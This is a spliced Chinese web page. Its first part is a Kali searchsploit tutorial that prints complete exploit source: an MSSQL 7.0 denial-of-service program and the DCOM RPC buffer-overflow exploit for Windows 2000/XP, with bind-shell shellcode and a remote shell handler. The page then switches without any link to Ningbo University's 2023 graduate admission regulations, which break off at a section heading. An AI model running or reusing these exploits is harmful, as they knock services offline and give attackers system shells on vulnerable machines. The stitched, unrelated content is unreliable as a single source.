https:7xf6com

⑴ 利用kali查找网站漏洞教学

Searchsploit

本文来自 www.cnhackteam.org

Searchsploit会通过本地的exploit-db， 查找软件漏洞信息

打开kali的命令行， 输入：

searchsploit

查看系统帮助

查找mssql的漏洞

如果要查找 mssql的漏洞， 命令如下， 会找到所有和mssql相关的漏洞信息， 后面还有相关的漏洞描述信息：

searchsploit mssql

要看相关的漏洞描述， 如果要看mysql7.0的远程DOS漏洞 ， 把漏洞描述后面的路径用编辑器打开即可：

leafpad /usr/share/exploitdb/platforms/./windows/dos/562.c

文本文件里面的内容为漏洞说明文件和漏洞利用文件：

/* Microsoft mssql 7.0 server is vulnerable to denial of service attack

* By sending a large buffer with specified data an attacker can stop

the service

* "mssqlserver" the error noticed is different according to services'

pack but the result is always

* the same one.

* Exception Codes = c0000005

* vulnerable: MSSQL7.0 sp0 - sp1 - sp2 - sp3

* This code is for ecational purposes, I am not responsible for your acts

* Greets:sm0g DEADm|x #crack.fr itmaroc and evryone who I forgot */ #include <stdio.h>

#include <winsock.h>

#pragma comment(lib,"ws2_32")

u_long resolv(char*);

void main(int argc, char **argv) {

WSADATA WinsockData;

SOCKET s; int i; struct sockaddr_in vulh; char buffer[700000]; for(i=0;i<700000;i+=16)memcpy(buffer+i,"\x10\x00\x00\x10\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc",16); if (argc!=3) {

printf(" MSSQL denial of service\n");

printf(" by securma massine\n");

printf("Cet outil a ete cree pour test ,je ne suis en aucun cas

responsable des degats que vous pouvez en faire\n");

printf("Syntaxe: MSSQLdos <ip> <port>\n");

exit(1);

}

WSAStartup(0x101,&WinsockData);

s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

ZeroMemory(&vulh,sizeof(vulh));

vulh.sin_family=AF_INET;

vulh.sin_addr.s_addr=resolv(argv[1]);

vulh.sin_port=htons(atoi(argv[2])); if (connect(s,(struct sockaddr*)&vulh,sizeof(vulh))==SOCKET_ERROR) {

printf("Impossible de se connecter...le port est en generale 1433...\n");

exit(1);

}

{

send(s,buffer,sizeof(buffer),0);

printf("Data envoyes...\n");

}

printf("\nattendez quelques secondes et verifiez que le serveur ne

repond plus.\n");

closesocket(s);

WSACleanup();

}

u_long resolv(char *host_name) { struct in_addr addr; struct hostent *host_ent; if ((addr.s_addr = inet_addr(host_name)) == -1) { if (!(host_ent = gethostbyname(host_name))) {

printf ("Erreur DNS : Impossible de résoudre l'adresse %s

!!!\n",host_name);

exit(1);

}

CopyMemory((char *)&addr.s_addr,host_ent->h_addr,host_ent->h_length);

} return addr.s_addr;

} // milw0rm.com [2004-09-29] View Code

查找和window XP有关的漏洞

searchsploit /xp

查看漏洞利用文件：

leafpad /usr/share/exploitdb/platforms/./windows/remote/66.c

/*

  DCOM RPC Overflow Discovered by LSD - Exploit Based on Xfocus's Code

  Written by H D Moore <hdm [at] metasploit.com>

  - Usage: ./dcom <Target ID> <Target IP>

  - Targets:

  -          0    Windows 2000 SP0 (english)

  -          1    Windows 2000 SP1 (english)

  -          2    Windows 2000 SP2 (english)

  -          3    Windows 2000 SP3 (english)

  -          4    Windows 2000 SP4 (english)

  -          5    Windows XP SP0 (english)

  -          6    Windows XP SP1 (english)

*/ #include <stdio.h> #include <stdlib.h> #include <error.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <unistd.h> #include <netdb.h> #include <fcntl.h> #include <unistd.h> unsigned char bindstr[]={ 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00, 0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00, 0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00, 0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00, 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00}; unsigned char request1[]={ 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03 ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00 ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45 ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41 ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00 ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45 ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03 ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00 ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29 ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00 ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00 ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00 ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10 ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10 ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09 ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00 ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00 ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00 ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00 ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01 ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03 ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00 ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00 ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00 ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00 ,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00 ,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00 ,0x00,0x00,0x00,0x00,0x00,0x00}; unsigned char request2[]={ 0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00 ,0x00,0x00,0x5C,0x00,0x5C,0x00}; unsigned char request3[]={ 0x5C,0x00 ,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00 ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00}; unsigned char *targets [] =

        { "Windows 2000 SP0 (english)", "Windows 2000 SP1 (english)", "Windows 2000 SP2 (english)", "Windows 2000 SP3 (english)", "Windows 2000 SP4 (english)", "Windows XP SP0 (english)", "Windows XP SP1 (english)", NULL }; unsigned long offsets [] =

        { 0x77e81674, 0x77e829ec, 0x77e824b5, 0x77e8367a, 0x77f92a9b, 0x77e9afe3, 0x77e626ba,

        }; unsigned char sc[]= "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00" "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00" "\x46\x00\x58\x00\x46\x00\x58\x00" "\xff\xff\xff\xff" /* return address */ "\xcc\xe0\xfd\x7f" /* primary thread data block */ "\xcc\xe0\xfd\x7f" /* primary thread data block */ /* port 4444 bindshell */ "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff" "\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2" "\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80" "\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09" "\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6" "\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf" "\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad" "\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81" "\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81" "\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80" "\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80" "\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80" "\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80" "\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80" "\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81" "\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6" "\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3" "\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50" "\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4" "\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4" "\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4" "\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f" "\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b" "\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80" "\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89" "\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80" "\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83" "\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83" "\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78" "\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c" "\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b" "\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04"; unsigned char request4[]={ 0x01,0x10 ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00 ,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C ,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00 }; /* ripped from TESO code */ void shell (int sock) { int l; char buf[512];

        fd_set  rfds; while (1) {

                FD_SET (0, &rfds);

                FD_SET (sock, &rfds);

                select (sock + 1, &rfds, NULL, NULL, NULL); if (FD_ISSET (0, &rfds)) {

                        l = read (0, buf, sizeof (buf)); if (l <= 0) { printf("\n - Connection closed by local user\n"); exit (EXIT_FAILURE);

                        }

                        write (sock, buf, l);

                } if (FD_ISSET (sock, &rfds)) {

                        l = read (sock, buf, sizeof (buf)); if (l == 0) { printf ("\n - Connection closed by remote host.\n"); exit (EXIT_FAILURE);

                        } else if (l < 0) { printf ("\n - Read failure\n"); exit (EXIT_FAILURE);

                        }

                        write (1, buf, l);

                }

        }

} int main(int argc, char **argv) { int sock; int len,len1; unsigned int target_id; unsigned long ret; struct sockaddr_in target_ip; unsigned short port = 135; unsigned char buf1[0x1000]; unsigned char buf2[0x1000]; printf("---------------------------------------------------------\n"); printf("- Remote DCOM RPC Buffer Overflow Exploit\n"); printf("- Original code by FlashSky and Benjurry\n"); printf("- Rewritten by HDM <hdm [at] metasploit.com>\n"); if(argc<3)

    { printf("- Usage: %s <Target ID> <Target IP>\n", argv[0]); printf("- Targets:\n"); for (len=0; targets[len] != NULL; len++)

        { printf("-          %d\t%s\n", len, targets[len]); 

        } printf("\n"); exit(1);

    } /* yeah, get over it :) */ target_id = atoi(argv[1]);

    ret = offsets[target_id]; printf("- Using return address of 0x%.8x\n", ret); memcpy(sc+36, (unsigned char *) &ret, 4);

    target_ip.sin_family = AF_INET;

    target_ip.sin_addr.s_addr = inet_addr(argv[2]);

    target_ip.sin_port = htons(port); if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)

    {

        perror("- Socket"); return(0);

    } if(connect(sock,(struct sockaddr *)⌖_ip, sizeof(target_ip)) != 0)

    {

        perror("- Connect"); return(0);

    }

    len=sizeof(sc); memcpy(buf2,request1,sizeof(request1));

    len1=sizeof(request1);

    *(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/2; 

    *(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(sc)/2; memcpy(buf2+len1,request2,sizeof(request2));

    len1=len1+sizeof(request2); memcpy(buf2+len1,sc,sizeof(sc));

    len1=len1+sizeof(sc); memcpy(buf2+len1,request3,sizeof(request3));

    len1=len1+sizeof(request3); memcpy(buf2+len1,request4,sizeof(request4));

    len1=len1+sizeof(request4);

    *(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(sc)-0xc;

    *(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(sc)-0xc; 

    *(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(sc)-0xc;

    *(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)-0xc;

    *(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(sc)-0xc;

    *(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(sc)-0xc;

    *(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(sc)-0xc;

    *(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(sc)-0xc; if (send(sock,bindstr,sizeof(bindstr),0)== -1)

    {

            perror("- Send"); return(0);

    }

    len=recv(sock, buf1, 1000, 0); if (send(sock,buf2,len1,0)== -1)

    {

            perror("- Send"); return(0);

    }

    close(sock);

    sleep(1);

    target_ip.sin_family = AF_INET;

    target_ip.sin_addr.s_addr = inet_addr(argv[2]);

    target_ip.sin_port = htons(4444); if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)

    {

        perror("- Socket"); return(0);

    } if(connect(sock,(struct sockaddr *)⌖_ip, sizeof(target_ip)) != 0)

    { printf("- Exploit appeared to have failed.\n"); return(0);

    } printf("- Dropping to System Shell...\n\n");

    shell(sock); return(0);

} // milw0rm.com [2003-07-26] View Code

查找apple的漏洞

searchsploit apple

⑵ 宁波大学2023年考研招生简章

宁波大学2023年硕士研究生招生章程

一、招生计划

2023年我校拟招收硕士研究生3667人（含推荐免试生、“退役大学生士兵”专项计划、联合培养计划等），其中全日制3116人、非全日制551人。各专业最终招生人数将根据2023年国家正式下达的招生计划数、推免生实际录取情况以及统考生源情况作相应增减调整。实际接收推免生人数以最后推免服务系统确认的录取人数为准。

三、报名

报名包括网上报名和网上确认两个阶段。所有参加硕士研究生招生考试的考生均须进行网上报名，并在网上确认网报信息和采集本人图像等相关电子信息，同时按规定缴纳报考费。

应届本科毕业生原则上应选择就读学校所在地省级教育招生考试机构指定的报考点办理网上报名和网上确认手续；其他考生（含工商管理、公共管理、旅游管理等专业学位考生）应选择工作所在地或户口所在地省级教育招生考试机构指定的报考点。

（一）网上报名

1.网上报名时间：2022年10月5日至10月25日，每天9：00-22:00。

网上预报名时间：2022年9月24日至9月27日，每天9：00-22:00。

2.报名流程：

考生应在规定时间登录“中国研究生招生信息网”（公网网址：https：//yz.chsi.com.cn ，教育网址：https://yz.chsi.cn，以下简称研招网）浏览报考须知，并按教育部、省级教育招生考试机构、报考点以及我校的相关要求报名。

报名期间，考生可自行修改网上报名信息或重新填报报名信息，但每位考生只能保留一条有效报名信息。逾期不再补报，也不得修改报名信息。

3.网上报名填写报考信息时注意事项：

（1）考生只能填报我校的一个专业。待初试结束，教育部公布考生进入复试的初试成绩基本要求后，考生可通过“研招网”调剂服务系统了解我校的调剂办法、计划余额等信息，并按相关规定填报调剂志愿。

（2）考生应按我校相关要求如实填写学习情况和提供真实材料。

（3）考生要准确填写本人所受奖惩情况，特别是要如实填写在参加普通和成人高等学校招生考试、全国硕士研究生招生考试、高等教育自学考试等国家教育考试过程中因违纪、作弊所受处罚情况。对弄虚作假者，将按照《国家教育考试违规处理办法》和《普通高等学校招生违规行为处理暂行办法》严肃处理。

（4）报名期间将对考生学历（学籍）信息进行网上校验，考生可上网查看学历（学籍）校验结果。考生可在报名前或报名期间自行登录“中国高等教育学生信息网”（网址：https://www.chsi.com.cn）查询本人学历（学籍）信息。

未能通过学历（学籍）网上校验的考生应及时到学籍学历权威认证机构进行认证，在复试前将认证报告交我校招生学院核验。

（5）报考“退役大学生士兵”专项硕士研究生招生计划的考生，应为高校学生应征入伍退出现役，且符合硕士研究生报考条件者〔高校学生指全日制普通本专科（含高职）、研究生、第二学士学位的应（往）届毕业生、在校生和入学新生，以及成人高校招收的普通本专科（高职）应（往）届毕业生、在校生和入学新生，下同〕。考生报名时应当选择填报退役大学生士兵专项计划，并按要求填报本人入伍前的入学信息以及入伍、退役等相关信息。

（6）符合规定条件并申请享受初试加分政策的考生，须在网上报名时按要求填报相关信息。

（7）考生应当认真了解并严格按照报考条件及相关政策要求填报志愿并选择报考点。因不符合报考条件及相关政策要求，造成后续不能网上确认、考试、复试或录取的，后果由考生本人承担。

（8）考生应当按要求准确填写个人网上报名信息并提供真实材料。考生因网报信息填写错误、填报虚假信息而造成不能考试（含初试和复试）或录取的，后果由考生本人承担。

（9）考生网上报名成功后，应通过定期查阅省级教育招生考试机构、报考点、招生单位官方网站等方式，主动了解考试安排、防疫要求等事项，积极配合完成相关工作。

（二）网上确认

1．所有考生（不含推免生）均应当在规定时间内在网上核对并确认其网上报名信息，逾期不再补办。

2. 网上确认时间由各省级教育招生考试机构根据国家招生工作安排和本地区报考组织情况自行确定和公布，请考生及时关注。

3．考生网上确认时应当积极配合报考点工作人员，根据核验工作需要，按要求提交本人居民身份证、学历学位证书（应届本科毕业生持学生证）和网上报名编号等，由报考点工作人员进行核对。

4. 所有考生均应当对其本人网上报名信息进行认真核对并确认。报名信息经考生确认后一律不作修改，因考生填写错误引起的一切后果由其自行承担。

5.考生应当按规定缴纳报考费。

6.考生应当按报考点规定配合采集本人图像等相关电子信息。

7.考生报名时须签署《考生诚信考试承诺书》并遵守相关约定及要求。

8.网上确认的具体事项届时详见报考点通知。

四、考生报考资格审查

所有报考我校考生须仔细阅读我校当年招生章程及招生目录，详细了解各专业的报考条件、考试科目、学制、备注等信息。我校对考生网上填报的报考信息进行全面审查，确定考生的考试资格。考生填报的报名信息与报考条件不符的，不得准予考试。

在复试前将对考生的有效身份证件、学历学位证书、学历学籍核验结果、学生证等报名材料原件及考生资格进行严格审查，对不符合规定者，不予复试。

对未通过网上学历（学籍）校验的考生，我校要求其在复试前提供权威机构出具的认证证明。

对弄虚作假者（含推免生），不论何时，一经查实，即按有关规定取消报考资格、复试资格、录取资格、入学资格或学籍。

五、初试

（一）打印准考证

考生应当在考前十天左右，凭网报用户名和密码登陆“研招网”自行下载打印《准考证》。《准考证》使用A4幅面白纸打印，正、反两面在使用期间不得涂改或书写。考生凭下载打印的《准考证》及有效居民身份证参加初试和复试。

（二）初试时间

2022年12月24日至12月25日（每天上午8:30-11:30，下午14:00-17:00）。

考试时间以北京时间为准。不在规定日期举行的硕士研究生招生考试，国家一律不予承认。

（三）初试地点

考生网上确认的报考点指定的考试地点。

六、复试

（一）复试基本要求

达到教育部确定的全国硕士研究生招生考试初试成绩基本要求。我校个别专业视上线生源情况，复试实际分数线可能会高于国家分数线的成绩基本要求。

我校依据教育部有关政策自主确定并公布“退役大学生士兵”专项计划考生进入复试的初试成绩要求和接收其他招生单位该计划考生调剂的初试成绩要求。

（二）复试形式

复试是硕士研究生招生考试的重要组成部分，用于考查考生的创新能力、专业素养和综合素质等，是硕士研究生录取的必要环节，复试不合格者不予录取。复试时间一般安排在2023年3-4月份，具体要求和程序见我校当年硕士研究生复试录取办法。

以同等学力身份（以报名时填报的信息为准）报考的考生〔除法律硕士（非法学）、工商管理硕士、公共管理硕士、旅游管理硕士外〕，复试时须加试两门与报考专业相关的本科主干课程。加试科目不得与初试科目相同。加试方式为笔试。

七、调剂

调剂工作的具体要求和程序由我校按教育部录取政策确定并公布。届时，考生可通过研招网调剂服务系统填报调剂志愿。

八、体检

体检参照教育部、原卫生部、中国残联印发的《普通高等学校招生体检工作指导意见》（教学〔2003〕3号）要求，按照《教育部办公厅 卫生部办公厅关于普通高等学校招生学生入学身体检查取消乙肝项目检测有关问题的通知》（教学厅〔2010〕2号）等文件的要求执行。复试后拟录取考生应到我校医院或其他二级甲等以上（含二级甲等）医院进行体格检查，具体体检时间另行通知。

九、录取

（一）我校根据教育部下达的招生计划、复试录取办法以及考生初试和复试成绩、思想政治表现、身心健康状况等择优确定拟录取名单。

我校将把考生考试诚信状况作为思想政治素质和品德考核的重要内容和录取的重要依据。对于思想品德考核不合格者，不予录取。

（二）硕士研究生按其学习方式分为全日制和非全日制。硕士研究生按其就业方式分为非定向就业和定向就业：非定向就业的硕士研究生须于入学前在规定时间内将人事档案、组织关系转入我校；定向就业的硕士研究生应当在被录取前与我校、用人单位分别签订定向就业合同，在校期间不转人事档案，不转组织关系，不迁移户口，学校不安排住宿，不负责就业及派遣等事宜。

（三）经考生确认的报考信息在录取阶段一律不作修改，对报考资格不符合规定者不予录取。

（四）经我校录取的研究生新生须在规定的期限内到校办理报到入学手续。因故不能按时报到者，应凭有关证明事先向所在学院请假，请假期限为两周，否则视为放弃入学资格。应届本科毕业生及自学考试和网络教育届时可毕业本科生考生，入学时未取得国家承认的本科毕业证书者，录取资格无效。推免生未取得学士学位或本科毕业证书，或受到处分的，取消录取资格。

（五）新生报到入学后，我校将对其进行思想政治素质和道德品质、专业素质、健康状况等全面复查，发现有不符合标准者按照有关规定进行处理。

十、违规处理

